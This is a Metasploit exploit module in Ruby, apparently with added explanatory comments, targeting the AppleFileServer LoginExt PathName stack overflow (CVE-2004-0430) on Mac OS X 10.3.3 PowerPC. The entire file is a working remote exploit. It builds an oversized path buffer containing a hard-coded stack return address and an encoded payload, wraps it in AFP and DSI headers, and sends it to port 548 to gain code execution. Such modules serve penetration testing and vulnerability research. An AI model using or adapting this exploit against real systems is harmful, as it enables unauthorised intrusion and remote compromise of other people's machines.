##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Exploit module for the AppleFileServer (AFP) LoginExt PathName stack
# overflow on Mac OS X (CVE-2004-0430 / OSVDB 5762 / BID 10271).
#
# The module opens a TCP connection to the AFP port, sends a single DSI
# request carrying an FPLoginExt with an oversized (1024-byte) path name,
# then hands control to the payload handler. There is exactly one target
# (Mac OS X 10.3.3, PPC) and the return address is a fixed stack address,
# which is why the description warns that it only works under optimal
# conditions and that the service can only be hit once.
class Metasploit3 < Msf::Exploit::Remote
  # Framework reliability rank. The description notes a single attempt and a
  # hard-coded stack return address, so reliability is limited.
  Rank = AverageRanking

  # Provides connect / sock / disconnect and the RPORT/RHOST options.
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints, the
  # single PPC target) and sets the default port to AFP's 548.
  #
  # info - Hash of module info merged by update_info (default: {}).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AppleFileServer LoginExt PathName Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the AppleFileServer service
        on MacOS X. This vulnerability was originally reported by Atstake and
        was actually one of the few useful advisories ever published by that
        company. You only have one chance to exploit this bug.
        This particular exploit uses a stack-based return address that will
        only work under optimal conditions.
      },
      'Author'         => 'hdm',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2004-0430'],
          [ 'OSVDB', '5762'],
          [ 'BID', '10271'],
        ],
      'Payload'        =>
        {
          # Encoded payload is capped at 512 bytes; it is written at offset 172
          # of the 1024-byte path buffer built in #exploit, so it always fits.
          'Space'    => 512,
          # NUL and space may not appear in the encoded payload.
          'BadChars' => "\x00\x20",
          'MinNops'  => 128,
          'Compat'   =>
            {
              'ConnectionType' => "+find"
            }
        },
      'Targets'        =>
        [
          # Target 0
          [
            'Mac OS X 10.3.3',
            {
              'Platform' => 'osx',
              'Arch'     => ARCH_PPC,
              # Return address points into the stack, not a fixed library
              # address, hence the "optimal conditions" caveat above.
              'Ret'      => 0xf0101c0c # stack address :<
            },
          ],
        ],
      'DisclosureDate' => 'May 3 2004'))

    # Configure the default port to be AFP
    register_options(
      [
        Opt::RPORT(548),
      ], self.class)
  end

  # Builds and sends the single malformed FPLoginExt request.
  #
  # Layout of the path buffer (1024 bytes of 0xff):
  #   [168, 4)   packed return address for the target arch
  #   [172, ...) the encoded payload (at most 512 bytes, see 'Space')
  # The buffer is wrapped in an AFP FPLoginExt body, which in turn is wrapped
  # in a DSI header, and written to the socket in one put. The payload
  # handler then runs before the connection is closed.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # Filler first; the slice assignments below keep the total length at 1024.
    path = "\xff" * 1024
    path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)
    path[172, payload.encoded.length] = payload.encoded

    # The AFP header
    # 0x3f (63) is the FPLoginExt command code; the remaining bytes are zero.
    afp = "\x3f\x00\x00\x00"

    # Add the authentication methods
    # Each is a Pascal-style string: one length byte followed by the text.
    ["AFP3.1", "Cleartxt Passwrd"].each { |m|
      afp << [m.length].pack('C') + m
    }

    # Add the user type and afp path
    # Both fields use a type byte (0x03), a 16-bit big-endian length ('n')
    # and the data. The user name is 9 random alphanumerics; the path is the
    # 1024-byte buffer built above, so its length field reads 1024.
    afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9)
    afp << "\x03" + [path.length].pack('n') + path

    # Add the data stream interface header
    # pack("CCnNNN"): two 8-bit fields, one 16-bit and three 32-bit
    # big-endian fields, followed by the AFP body itself.
    dsi =
      [
        0,            # Flags
        2,            # Command
        rand(65536),  # XID
        0,            # Data Offset
        afp.length,   # Data Length
        0             # Reserved
      ].pack("CCnNNN") + afp

    # Single write; the description notes there is only one attempt per service.
    sock.put(dsi)

    # Let the payload handler run before tearing down the connection.
    handler

    disconnect
  end

end